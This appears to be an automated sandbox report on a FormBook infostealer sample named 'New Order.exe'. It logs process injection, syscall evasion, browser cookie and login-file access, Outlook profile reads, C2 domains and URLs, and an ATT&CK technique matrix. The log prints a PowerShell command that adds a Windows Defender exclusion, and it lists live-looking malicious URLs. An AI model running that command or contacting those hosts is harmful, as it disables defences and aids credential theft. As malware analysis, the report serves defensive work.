                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtSetInformationProcess: Direct from: 0x77382C5CJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtCreateUserProcess: Direct from: 0x7738371CJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtQueryInformationProcess: Direct from: 0x77382C26Jump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtResumeThread: Direct from: 0x77382FBCJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtWriteVirtualMemory: Direct from: 0x7738490CJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtAllocateVirtualMemory: Direct from: 0x77383C9CJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtReadFile: Direct from: 0x77382ADCJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtAllocateVirtualMemory: Direct from: 0x77382BFCJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtDelayExecution: Direct from: 0x77382DDCJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtQuerySystemInformation: Direct from: 0x77382DFCJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtOpenSection: Direct from: 0x77382E0CJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtQueryVolumeInformationFile: Direct from: 0x77382F2CJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtQuerySystemInformation: Direct from: 0x773848CCJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtReadVirtualMemory: Direct from: 0x77382E8CJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtCreateKey: Direct from: 0x77382C6CJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtClose: Direct from: 0x77382B6C
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtAllocateVirtualMemory: Direct from: 0x773848ECJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtQueryAttributesFile: Direct from: 0x77382E6CJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtSetInformationThread: Direct from: 0x77382B4CJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtTerminateThread: Direct from: 0x77382FCCJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtQueryInformationToken: Direct from: 0x77382CACJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtOpenKeyEx: Direct from: 0x77382B9CJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtAllocateVirtualMemory: Direct from: 0x77382BECJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtDeviceIoControlFile: Direct from: 0x77382AECJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtCreateFile: Direct from: 0x77382FECJump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeNtOpenFile: Direct from: 0x77382DCCJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeMemory written: C:\Users\user\Desktop\New Order.exe base: 400000 value starts with: 4D5AJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: NULL target: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe protection: execute and read and writeJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeSection loaded: NULL target: C:\Windows\SysWOW64\w32tm.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: NULL target: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: NULL target: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: read writeJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeSection loaded: NULL target: C:\Program Files\Mozilla Firefox\firefox.exe protection: execute and read and writeJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeThread register set: target process: 1708Jump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeThread APC queued: target process: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\New Order.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Users\user\Desktop\New Order.exe "C:\Users\user\Desktop\New Order.exe"Jump to behavior
                Source: C:\Users\user\Desktop\New Order.exeProcess created: C:\Users\user\Desktop\New Order.exe "C:\Users\user\Desktop\New Order.exe"Jump to behavior
                Source: C:\Program Files (x86)\jxvBoUoRVImTlYTBniSBFOGvGdJGecWXoXjUJTHdYuHBHGyZlaKpIgYeTZDrsAOiz\XVZmwHdSYwx.exeProcess created: C:\Windows\SysWOW64\w32tm.exe "C:\Windows\SysWOW64\w32tm.exe"Jump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
                Source: XVZmwHdSYwx.exe, 0000000D.00000002.4633352473.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000000.2407699735.0000000000DB0000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000000.2558639122.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: IProgram Manager
                Source: XVZmwHdSYwx.exe, 0000000D.00000002.4633352473.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000000.2407699735.0000000000DB0000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000000.2558639122.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Shell_TrayWnd
                Source: XVZmwHdSYwx.exe, 0000000D.00000002.4633352473.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000000.2407699735.0000000000DB0000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000000.2558639122.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progman
                Source: XVZmwHdSYwx.exe, 0000000D.00000002.4633352473.0000000000DB1000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 0000000D.00000000.2407699735.0000000000DB0000.00000002.00000001.00040000.00000000.sdmp, XVZmwHdSYwx.exe, 00000011.00000000.2558639122.00000000014C0000.00000002.00000001.00040000.00000000.sdmpBinary or memory string: Progmanlock
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Users\user\Desktop\New Order.exe VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Fonts\micross.ttf VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\New Order.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 8.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2489286072.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4636187188.0000000005250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4633862013.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4633798417.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2490425395.0000000002620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4633944997.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Network\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web DataJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local StateJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeFile opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Network\CookiesJump to behavior
                Source: C:\Windows\SysWOW64\w32tm.exeKey opened: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\Jump to behavior

                Remote Access Functionality

                barindex
                Source: Yara matchFile source: 8.2.New Order.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.New Order.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 0000000E.00000002.4629567782.0000000000950000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2489286072.00000000016B0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000011.00000002.4636187188.0000000005250000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4633862013.0000000002DB0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000E.00000002.4633798417.0000000002D60000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2486160123.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2490425395.0000000002620000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 0000000D.00000002.4633944997.0000000002F00000.00000040.00000001.00040000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
                DLL Side-Loading
                412
                Process Injection
                1
                Masquerading
                1
                OS Credential Dumping
                121
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
                Abuse Elevation Control Mechanism
                11
                Disable or Modify Tools
                LSASS Memory2
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                DLL Side-Loading
                41
                Virtualization/Sandbox Evasion
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares1
                Data from Local System
                4
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook412
                Process Injection
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture4
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
                Deobfuscate/Decode Files or Information
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Abuse Elevation Control Mechanism
                Cached Domain Credentials113
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1567406 Sample: New Order.exe Startdate: 03/12/2024 Architecture: WINDOWS Score: 100 37 www.aiactor.xyz 2->37 39 www.lgdiamonds.info 2->39 41 19 other IPs or domains 2->41 49 Suricata IDS alerts for network traffic 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 Yara detected FormBook 2->53 57 7 other signatures 2->57 10 New Order.exe 4 2->10         started        signatures3 55 Performs DNS queries to domains with low reputation 37->55 process4 file5 35 C:\Users\user\AppData\...35ew Order.exe.log, ASCII 10->35 dropped 69 Adds a directory exclusion to Windows Defender 10->69 71 Injects a PE file into a foreign processes 10->71 14 New Order.exe 10->14         started        17 powershell.exe 23 10->17         started        19 New Order.exe 10->19         started        signatures6 process7 signatures8 73 Maps a DLL or memory area into another process 14->73 21 XVZmwHdSYwx.exe 14->21 injected 75 Loading BitLocker PowerShell Module 17->75 24 conhost.exe 17->24         started        process9 signatures10 59 Found direct / indirect Syscall (likely to bypass EDR) 21->59 26 w32tm.exe 13 21->26         started        process11 signatures12 61 Tries to steal Mail credentials (via file / registry access) 26->61 63 Tries to harvest and steal browser information (history, passwords, etc) 26->63 65 Modifies the context of a thread in another process (thread injection) 26->65 67 3 other signatures 26->67 29 XVZmwHdSYwx.exe 26->29 injected 33 firefox.exe 26->33         started        process13 dnsIp14 43 www.lgdiamonds.info 130.185.109.77, 50020, 50026, 50033 XIRRADE Germany 29->43 45 gravendeel.studio 172.104.18.233, 50047, 50048, 50049 LINODE-APLinodeLLCUS United States 29->45 47 11 other IPs or domains 29->47 77 Found direct / indirect Syscall (likely to bypass EDR) 29->77 signatures15

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                New Order.exe58%ReversingLabsByteCode-MSIL.Backdoor.FormBook
                New Order.exe100%Joe Sandbox ML
                No Antivirus matches
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://www.717hy.net/ffyl/?u6nP_F48=E0w2q4MWRkFX7XJTCFHtBeMrFLWo0m25Rc1Iug5umE0SqvxIQJbSqlJsxR0jPeALC0qf+EILQRQVRMVyHOYHvE1WYG6fPKkQNyF776m1LEnS8hs9By21ThuVAZMLKVLgjh2k5HE=&F8S0G=ul80rPhxFlR8lH0%Avira URL Cloudsafe
                http://www.lgdiamonds.info/q2b2/0%Avira URL Cloudsafe
                http://www.bootleggersrt.online/7a5n/0%Avira URL Cloudsafe
                http://www.717hy.net/ffyl/0%Avira URL Cloudsafe
                http://www.614genetics.online/614_Genetics_Online_Class.cfm?fp=GPZqom54Zw2OunBTGjv%2BCiwC4YcGWNmE%2F0%Avira URL Cloudsafe
                http://www.614genetics.online/display.cfm0%Avira URL Cloudsafe
                http://www.lgdiamonds.info/q2b2/?u6nP_F48=k8LEnfe2wzSPKnd+4j+FHsRof8pP0SbHpdiozyXUU8wG1G+DI2HbB69btAHUx0UZtSY5up0HFKX7joYW5N4IdT0eHsdsbM4tAcjV6Y0GGqKWlvaVbVOKX21NPAfOVONObcqqhCU=&F8S0G=ul80rPhxFlR8lH0%Avira URL Cloudsafe
